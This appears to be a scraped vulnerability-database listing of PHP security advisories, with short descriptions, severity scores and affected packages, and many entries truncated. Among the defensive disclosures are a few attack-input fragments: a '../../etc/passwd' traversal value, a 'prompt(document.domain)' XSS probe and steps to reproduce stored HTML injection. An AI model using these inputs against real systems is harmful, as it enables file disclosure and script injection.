Sources
NVD
Composer Severity HIGH Has Fix Added at: Mar 24, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in yo
Wiz
CVE-2026-33716 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.4
CVE-2026-33716 [CRITICAL] CVE-2026-33716 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33716 :
PHP vulnerability analysis and mitigation
plugin/Live/standAloneFiles/control.json.php
streamerURL
{"error": false}
Source : NVD
## 9.4
Score
Published March 23, 2026
Severity CRITICAL
CNA Score 9.4
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 26.1
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity CRITICAL No Fix Added at: Mar 26, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA
Wiz
CVE-2025-69197 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2025-69197 [MEDIUM] CVE-2025-69197 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-69197 :
PHP vulnerability analysis and mitigation
Pterodactyl is a free, open-source game server management panel. Versions 1.11.11 and below allow TOTP to be used multiple times during its validity window. Users with 2FA enabled are prompted to enter a token during sign-in, and afterward it is not sufficiently marked as used in the system. This allows an attacker who intercepts that token to use it in addition to a known username/password during the 60-second token validity window. The attacker must have intercepted a valid 2FA token (for example, during a screen share). This issue is fixed in version 1.12.0.
Source : NVD
## 6.5
Score
Published January 6, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
C
Wiz
GHSA-67v7-3g49-mxh2 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
[MEDIUM] GHSA-67v7-3g49-mxh2 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-67v7-3g49-mxh2 :
PHP vulnerability analysis and mitigation
## Impact
A time-based user enumeration vulnerability in the user authentication functionality of PrestaShop. This vulnerability allows an attacker to determine whether a customer account exists in the system by measuring response times.
## Patches
8.2.4 and 9.0.3
## Workarounds
none
## References
Found by Lam Yiu Tung
Source : NVD
## 5.3
Score
Published February 3, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
prestashop/prestashop
Sources
NVD
Composer Severity MEDIU
Wiz
CVE-2026-33502 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.3
CVE-2026-33502 [CRITICAL] CVE-2026-33502 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33502 :
PHP vulnerability analysis and mitigation
plugin/Live/test.php
Source : NVD
## 8.2
Score
Published March 23, 2026
Severity HIGH
CNA Score 9.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity CRITICAL No Fix Added at: Mar 21, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
GHSA-h6rj-3m53-887h
HI
Wiz
CVE-2026-33687 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-33687 [HIGH] CVE-2026-33687 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33687 :
PHP vulnerability analysis and mitigation
ApiFormUploadController
validation_rule
validation_rule[]=file
Source : NVD
## 8.8
Score
Published March 26, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 14.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
code16/sharp
Sources
NVD
Composer Severity HIGH Has Fix Added at: Mar 26, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has f
Wiz
CVE-2026-33688 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-33688 [MEDIUM] CVE-2026-33688 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33688 :
PHP vulnerability analysis and mitigation
objects/userRecoverPass.php
Source : NVD
## 5.3
Score
Published March 23, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 26, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
GHSA-h6rj-3m53
Wiz
CVE-2026-33723 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-33723 [HIGH] CVE-2026-33723 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33723 :
PHP vulnerability analysis and mitigation
Subscribe::save()
objects/subscribe.php
$this->users_id
$_POST['user_id']
subscribe.json.php
subscribeNotify.json.php
Source : NVD
## 6.5
Score
Published March 23, 2026
Severity MEDIUM
CNA Score 7.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 26, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Sc
Wiz
CVE-2026-29788 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.4
CVE-2026-29788 [HIGH] CVE-2026-29788 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-29788 :
PHP vulnerability analysis and mitigation
TSPortal is the WikiTide Foundation’s in-house platform used by the Trust and Safety team to manage reports, investigations, appeals, and transparency work. Prior to version 30, conversion of empty strings to null allows disguising DPA reports as genuine self-deletion reports. This issue has been patched in version 30.
Source : NVD
## 8.4
Score
Published March 6, 2026
Severity HIGH
CNA Score 8.4
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
miraheze/ts-portal
Sources
NVD
Composer Severity HIGH Has Fix Added at: Mar 29,
Wiz
CVE-2026-33297 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
CVE-2026-33297 [MEDIUM] CVE-2026-33297 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33297 :
PHP vulnerability analysis and mitigation
setPassword.json.php
Source : NVD
## 5.1
Score
Published March 23, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 20, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
GHSA-h6rj-3m53-887h
Wiz
GHSA-vvg7-8rmq-92g7 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
[MEDIUM] GHSA-vvg7-8rmq-92g7 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-vvg7-8rmq-92g7 :
PHP vulnerability analysis and mitigation
## Description
In applications built with the Auth0-PHP SDK, the audience validation in access tokens is performed improperly. Without proper validation, affected applications may accept ID tokens as Access tokens.
## Affected product and versions
Projects are affected if they meet the following preconditions:
Applications using the Auth0 Wordpress plugin with version between 5.0.0-BETA0 and 5.4.0,
Auth0 Wordpress plugin uses the Auth0-PHP SDK with versions between 8.0.0 and 8.17.0.
## Resolution
Upgrade Auth0 Wordpress plugin to version 5.5.0 or greater.
## Acknowledgement
Okta would like to thank Jafar Sadiq (iaf4r) for their discovery and responsible disclosure.
Source : NVD
## 6.8
Score
Published
Wiz
CVE-2026-34572 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-34572 [HIGH] CVE-2026-34572 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34572 :
PHP vulnerability analysis and mitigation
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to immediately revoke active user sessions when an account is deactivated. Due to a logic flaw in the backend design, account state changes are enforced only during authentication (login), not for already-established sessions. The system implicitly assumes that authenticated users remain trusted for the lifetime of their session. There is no session expiration or account expiration mechanism in place, causing deactivated accounts to retain indefinite access until the user manually logs out. This behavior breaks the intended access control
Wiz
CVE-2025-14675 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
CVE-2025-14675 [HIGH] CVE-2025-14675 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-14675 :
PHP vulnerability analysis and mitigation
The Meta Box plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the 'ajax_delete_file' function in all versions up to, and including, 5.11.1. This makes it possible for authenticated attackers, with Contributor-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).
Source : NVD
## 7.2
Score
Published March 7, 2026
Severity HIGH
CNA Score 7.2
Affected Technologies
PHP
WordPress
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 75.5
Exploitation Probability (EPS
Wiz
CVE-2025-69213 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2025-69213 [HIGH] CVE-2025-69213 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-69213 :
PHP vulnerability analysis and mitigation
OpenSTAManager is an open source management software for technical assistance and invoicing. In version 2.9.8 and prior, a SQL Injection vulnerability exists in the ajax_complete.php endpoint when handling the get_sedi operation. An authenticated attacker can inject malicious SQL code through the idanagrafica parameter, leading to unauthorized database access. At time of publication, no known patch exists.
Source : NVD
## 8.7
Score
Published February 4, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 11.7
Exploitation Probability (EPSS) N/A
Affected packages and l
Wiz
CVE-2022-50807 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2022-50807 [MEDIUM] CVE-2022-50807 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2022-50807 :
PHP vulnerability analysis and mitigation
Rejected reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue.
Source : NVD
## 6.9
Score
Published January 13, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
concrete5/concrete5
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Jan 14, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Se
Wiz
CVE-2026-35449 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-35449 [MEDIUM] CVE-2026-35449 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35449 :
PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. In versions 26.0 and prior, the install/test.php diagnostic script has its CLI-only access guard disabled by commenting out the die() statement. The script remains accessible via HTTP after installation, exposing video viewer statistics including IP addresses, session IDs, and user agents to unauthenticated visitors.
Source : NVD
## 5.3
Score
Published April 6, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Se
Wiz
CVE-2025-70791 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2025-70791 [MEDIUM] CVE-2025-70791 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-70791 :
PHP vulnerability analysis and mitigation
Cross Site Scripting vulnerability in the "/admin/order/abandoned" endpoint of Microweber 2.0.19. An attacker can manipulate the "orderDirection" parameter in a crafted URL and lure a user with admin privileges into visiting it, achieving JavaScript code execution in the victim's browser. The issue was reported to the developers and fixed in version 2.0.20.
Source : NVD
## 6.1
Score
Published February 5, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
microweber/microweber
Sources
NVD
Co
Wiz
CVE-2026-33488 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.4
CVE-2026-33488 [HIGH] CVE-2026-33488 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33488 :
PHP vulnerability analysis and mitigation
createKeys()
generateKeys.json.php
encryptMessage.json.php
Source : NVD
## 8.1
Score
Published March 23, 2026
Severity HIGH
CNA Score 7.4
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 21, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Pu
Wiz
CVE-2026-35544 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-35544 [MEDIUM] CVE-2026-35544 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35544 :
PHP vulnerability analysis and mitigation
An issue was discovered in Roundcube Webmail before 1.5.14 and 1.6.14. Insufficient Cascading Style Sheets (CSS) sanitization in HTML e-mail messages may lead to a fixed-position mitigation bypass via the use of !important.
Source : NVD
## 5.3
Score
Published April 3, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
roundcube/roundcubemail
roundcube
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM Has Fix Added at: Apr 05, 2026
Echo Severity MEDIUM Has Fix Added at: Apr 0
Wiz
CVE-2026-33883 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-33883 [MEDIUM] CVE-2026-33883 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33883 :
PHP vulnerability analysis and mitigation
user:reset_password_form
Source : NVD
## 6.1
Score
Published March 27, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
statamic/cms
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Mar 29, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
GHSA-h6rj-3m53-887h
Wiz
GHSA-mgr9-6c2j-jxrq Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
[MEDIUM] GHSA-mgr9-6c2j-jxrq Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-mgr9-6c2j-jxrq :
PHP vulnerability analysis and mitigation
Message from the Pterodactyl team:
The Pterodactyl team has evaluated this as a minor security issue but does not consider it something that should be assigned a CVE, nor does it require active patching by vulnerable systems.
This issue is entirely self-inflicted and requires an administrative user paste an obviously incorrect value into a database host field, submit it, and run into the XSS when the error message is rendered. However, we have determined that this fix is good security hygiene and may prevent issues in other areas not yet discovered.
## Summary
Host
gethostaddr
prompt(document.domain)
Host
Source : NVD
## 2
Score
Published December 30, 2025
Severity LOW
CNA Score N/A
Affected Technologies
Wiz
CVE-2024-58303 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2024-58303 [HIGH] CVE-2024-58303 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2024-58303 :
PHP vulnerability analysis and mitigation
FoF Pretty Mail 1.1.2 contains a server-side template injection vulnerability that allows administrative users to inject malicious code into email templates. Attackers can execute system commands by inserting crafted template expressions that trigger arbitrary code execution during email generation.
Source : NVD
## 8.6
Score
Published December 11, 2025
Severity HIGH
CNA Score 8.6
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
fof/pretty-mail
Sources
NVD
Composer Severity HIGH No Fix Added at: Dec 12, 2025
## Get a CVE
Wiz
CVE-2026-28423 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.8
CVE-2026-28423 [MEDIUM] CVE-2026-28423 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28423 :
PHP vulnerability analysis and mitigation
Statmatic is a Laravel and Git powered content management system (CMS). Prior to versions 5.73.11 and 6.4.0, when Glide image manipulation is used in insecure mode (which is not the default), the image proxy can be abused by an unauthenticated user to make the server send HTTP requests to arbitrary URLs—either via the URL directly or via the watermark feature. That can allow access to internal services, cloud metadata endpoints, and other hosts reachable from the server. This has been fixed in 5.73.11 and 6.4.0.
Source : NVD
## 8.6
Score
Published February 27, 2026
Severity HIGH
CNA Score 6.8
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
E
Wiz
CVE-2026-25493 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-25493 [MEDIUM] CVE-2026-25493 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25493 :
PHP vulnerability analysis and mitigation
Craft is a platform for creating digital experiences. In Craft versions 4.0.0-RC1 through 4.16.17 and 5.0.0-RC1 through 5.8.21, the saveAsset GraphQL mutation validates the initial URL hostname and resolved IP against a blocklist, but Guzzle follows HTTP redirects by default. An attacker can bypass all SSRF protections by hosting a redirect that points to cloud metadata endpoints or any internal IP addresses. This issue is patched in versions 4.16.18 and 5.8.22.
Source : NVD
## 6.9
Score
Published February 9, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
PHP
Craft CMS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EP
Wiz
CVE-2026-31824 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.2
CVE-2026-31824 [HIGH] CVE-2026-31824 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31824 :
PHP vulnerability analysis and mitigation
Sylius is an Open Source eCommerce Framework on Symfony. A Time-of-Check To Time-of-Use (TOCTOU) race condition was discovered in the promotion usage limit enforcement. The same class of vulnerability affects the promotion usage limit (the global used counter on Promotion entities), coupon usage limit (the global used counter on PromotionCoupon entities), and coupon per-customer usage limit (the per-customer redemption count on PromotionCoupon entities). In all three cases, the eligibility check reads the used counter (or order count) from an in-memory Doctrine entity during validation, while the actual usage increment in OrderPromotionsUsageModifier happens later during order completion — with no database-level locking or ato
Wiz
CVE-2026-33886 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-33886 [MEDIUM] CVE-2026-33886 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33886 :
PHP vulnerability analysis and mitigation
Statamic is a Laravel and Git powered content management system (CMS). Starting in version 5.7.12 and prior to versions 5.73.16 and 6.7.2, a control panel user with access to Antlers-enabled fields could access sensitive application configuration values by inserting config variables into their content. This has been fixed in 5.73.16 and 6.7.2.
Source : NVD
## 6.5
Score
Published March 27, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10
Exploitation Probability (EPSS) N/A
Affected packages and libraries
statamic/cms
Sources
NVD
Composer Severity MEDIUM Has
Wiz
CVE-2026-34563 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2026-34563 [CRITICAL] CVE-2026-34563 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34563 :
PHP vulnerability analysis and mitigation
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input when handling backup uploads and processing backup metadata. An attacker can inject a malicious JavaScript payload into the backup filename via the uploaded xss.sql, which uses SQL functionality to insert the XSS payload server-side. This stored payload is later rendered unsafely in multiple backup management views without proper output encoding, leading to stored blind cross-site scripting (Blind XSS). This issue has been patched in version 0.31.0.0.
Source : NVD
## 9.1
Score
Published Apri
Wiz
GHSA-qrfh-cc86-vc8c Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
[MEDIUM] GHSA-qrfh-cc86-vc8c Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-qrfh-cc86-vc8c :
PHP vulnerability analysis and mitigation
## Summary
firstname
lastname
## Vulnerable File
app/Domain/Users/Templates/editUser.tpl.php
## Vulnerable Code (Lines ~14-17)
value=""
value=""
These fields output raw user input without sanitization.
## Steps to Reproduce
Login as admin > Go to Settings > Users > Edit any user
INJECTED
Save the user profile
Create or view an article — the injected HTML renders in the author name
## Fix
echo
htmlspecialchars()
value=""
value=""
$this->e()
editOwn.tpl.php
## Impact
Stored HTML injection visible to all users viewing affected content
Can be used for phishing, fake login forms, and UI defacement
Affects all versions before 3.3.0
Source : NVD
## 5.4
Score
Published March 5, 2026
Severit
Wiz
CVE-2026-32817 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2026-32817 [CRITICAL] CVE-2026-32817 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32817 :
PHP vulnerability analysis and mitigation
Admidio is an open-source user management solution. In versions 5.0.0 through 5.0.6, the documents and files module does not verify whether the current user has permission to delete folders or files. The folder_delete and file_delete action handlers in modules/documents-files.php only perform a VIEW authorization check (getFolderForDownload / getFileForDownload) before calling delete(), and they never validate a CSRF token. Because the target UUIDs are read from $_GET, deletion can be triggered by a plain HTTP GET request. When the module is in public mode (documents_files_module_enabled = 1) and a folder is marked public (fol_public = true), an unauthenticated attacker can permanently destroy the entire document library. Even
Wiz
CVE-2026-33764 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.3
CVE-2026-33764 [MEDIUM] CVE-2026-33764 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33764 :
PHP vulnerability analysis and mitigation
save.json.php
$_REQUEST['id']
Source : NVD
## 4.3
Score
Published March 27, 2026
Severity MEDIUM
CNA Score 4.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 29, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
GHSA-h6rj-3m
Wiz
CVE-2026-34560 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2026-34560 [CRITICAL] CVE-2026-34560 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34560 :
PHP vulnerability analysis and mitigation
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application renders user-controlled input unsafely within the logs interface. If any stored XSS payload exists within logged data, it is rendered without proper output encoding. This issue becomes a Blind XSS scenario because the attacker does not see immediate execution. Instead, the payload is stored within application logs and only executes later when an administrator views the logs page. This issue has been patched in version 0.31.0.0.
Source : NVD
## 9.1
Score
Published April 1, 2026
Severity CRITICAL
CNA Score 9.1
Affected Technologies
PHP
Wiz
CVE-2026-33183 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.0
CVE-2026-33183 [HIGH] CVE-2026-33183 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33183 :
PHP vulnerability analysis and mitigation
Saloon is a PHP library that gives users tools to build API integrations and SDKs. Prior to version 4.0.0, fixture names were used to build file paths under the configured fixture directory without validation. A name containing path segments (e.g. ../traversal or ../../etc/passwd) resulted in a path outside that directory. When the application read a fixture (e.g. for mocking) or wrote one (e.g. when recording responses), it could read or write files anywhere the process had access. If the fixture name was derived from user or attacker-controlled input (e.g. request parameters or config), this constituted a path traversal vulnerability and could lead to disclosure of sensitive files or overwriting of critical files. The fix in
Wiz
CVE-2026-26273 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-26273 [CRITICAL] CVE-2026-26273 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26273 :
PHP vulnerability analysis and mitigation
Known is a social publishing platform. Prior to 1.6.3, a Critical Broken Authentication vulnerability exists in Known 1.6.2 and earlier. The application leaks the password reset token within a hidden HTML input field on the password reset page. This allows any unauthenticated attacker to retrieve the reset token for any user by simply querying the user's email, leading to full Account Takeover (ATO) without requiring access to the victim's email inbox. This vulnerability is fixed in 1.6.3.
Source : NVD
## 9.8
Score
Published February 13, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probab
Wiz
CVE-2026-34739 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-34739 [MEDIUM] CVE-2026-34739 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34739 :
PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. In versions 26.0 and prior, the User_Location plugin's testIP.php page reflects the ip request parameter directly into an HTML input element without applying htmlspecialchars() or any other output encoding. This allows an attacker to inject arbitrary HTML and JavaScript via a crafted URL. Although the page is restricted to admin users, AVideo's SameSite=None cookie configuration allows cross-origin exploitation, meaning an attacker can lure an admin to a malicious link that executes JavaScript in their authenticated session. At time of publication, there are no publicly available patches.
Source : NVD
## 6.1
Score
Published March 31, 2026
Severity MEDIUM
CNA Score 6.1
Affe
Wiz
CVE-2026-3105 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.6
CVE-2026-3105 [HIGH] CVE-2026-3105 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3105 :
PHP vulnerability analysis and mitigation
SummaryThis advisory addresses a SQL injection vulnerability in the API endpoint used for retrieving contact activities. A vulnerability exists in the query construction for the Contact Activity timeline where the parameter responsible for determining the sort direction was not strictly validated against an allowlist, potentially allowing authenticated users to inject arbitrary SQL commands via the API.
MitigationPlease update to 4.4.19, 5.2.10, 6.0.8, 7.0.1 or later.
WorkaroundsNone.
ReferencesIf you have any questions or comments about this advisory:
Email us at [email protected]
Source : NVD
## 8.8
Score
Published February 24, 2026
Severity HIGH
CNA Score 7.6
Affected Technologies
PHP
